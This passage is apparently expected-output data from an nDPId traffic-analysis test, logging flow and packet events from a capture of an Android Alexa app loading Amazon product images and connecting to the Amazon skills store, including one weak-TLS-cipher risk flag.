{"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61oBTb+jZvL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2052,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134140,"flow_last_seen":1490976134203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/51woiL9kgkL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2053,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134141,"flow_last_seen":1490976134203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81diFQyVjHL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2054,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134144,"flow_last_seen":1490976134204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134204,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71GcCNTb6kL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2055,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1490976134237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134237,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxaJEqCkMupghaAScSCurAAAAgQFtAQCCAps+nR5APZytgEDAwg="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":3,"flow_last_seen":1490976134238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134238,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0EjNAAEAG3hysECrYNFQ\/OMsWAFAy6mCFiRKgpYAQAVdNOgAAAQEICgD2cr9s+nR5"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134149,"flow_last_seen":1490976134239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/612xlaOI2NL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976136930,"flow_last_seen":1490976136930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976136930,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1490976136930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976136930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bqFAAEAGoEasECrYNu8d\/Z+nAbuZbx1qAAAAAKAC\/\/9PLQAAAgQFtAQCCAoA9nPLAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2237,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1490976137042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976137042,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwrQVAAOcGuu027x39rBAq2AG7n6dEArKimW8da3ASH\/7pVAAAAgQFtAEDAwY="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2238,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":3,"flow_last_seen":1490976137043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976137043,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobqJAAEAGoFmsECrYNu8d\/Z+nAbuZbx1rRAKyo1AQAVczxgAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2239,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976136930,"flow_last_seen":1490976137044,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976137044,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2241,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976136930,"flow_last_seen":1490976137222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976137222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139642,"flow_last_seen":1490976139642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1490976139642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139642,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ooBAAEAGTcesECrYNFQ\/OMsYAFAytNZaAAAAAKAC\/\/+zQgAAAgQFtAQCCAoA9nTaAAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2275,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2275,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA82RlAAEAGFy6sECrYNFQ\/OMsZAFDfya3CAAAAAKAC\/\/8uwwAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ao9AAEAGhbisECrYNFQ\/OMsaAFCdOh5UAAAAAKAC\/\/8AwAAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2277,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ziFAAEAGIiasECrYNFQ\/OMsbAFAzpLr6AAAAAKAC\/\/\/NrgAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8c6xAAEAGfJusECrYNFQ\/OMscAFApFQd3AAAAAKAC\/\/+LwAAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8MrZAAEAGvZGsECrYNFQ\/OMsdAFCU10ZqAAAAAKAC\/\/\/hCAAAAgQFtAQCCAoA9nTcAAAAAAEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":1490976139667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139667,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxh7572AMrTWW6AScSAgygAAAgQFtAQCCAps+nrkAPZ02gEDAwg="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":3,"flow_last_seen":1490976139669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139669,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ooFAAEAGTc6sECrYNFQ\/OMsYAFAytNZbe+e9gYAQAVe\/XAAAAQEICgD2dN5s+nrk"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139642,"flow_last_seen":1490976139669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71nqwmwmRlL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxrjsd\/DnToeVaAScSDohQAAAgQFtAQCCAps+naYAPZ02wEDAwg="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxtRO\/n\/M6S6+6AScSAtRgAAAgQFtAQCCAps+ncBAPZ02wEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxlSuJ7038mtw6AScSDlMAAAAgQFtAQCCAps+nm5APZ02wEDAwg="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2286,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxx\/FDN0KRUHeKAScSCFPAAAAgQFtAQCCAps+nXPAPZ02wEDAwg="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2287,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0apBAAEAGhb+sECrYNFQ\/OMsaAFCdOh5V47HfxIAQAVeHGAAAAQEICgD2dN9s+naY"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2288,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ziJAAEAGIi2sECrYNFQ\/OMsbAFAzpLr7UTv6AIAQAVfL2AAAAQEICgD2dN9s+ncB"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02RpAAEAGFzWsECrYNFQ\/OMsZAFDfya3DUrie9YAQAVeDwwAAAQEICgD2dN9s+nm5"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139678,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c61AAEAGfKKsECrYNFQ\/OMscAFApFQd4fxQzdYAQAVcjzwAAAQEICgD2dN9s+nXP"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2291,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/315y9IEXZSL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2292,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/5100jxqrQhL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61SZU-lPFNL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 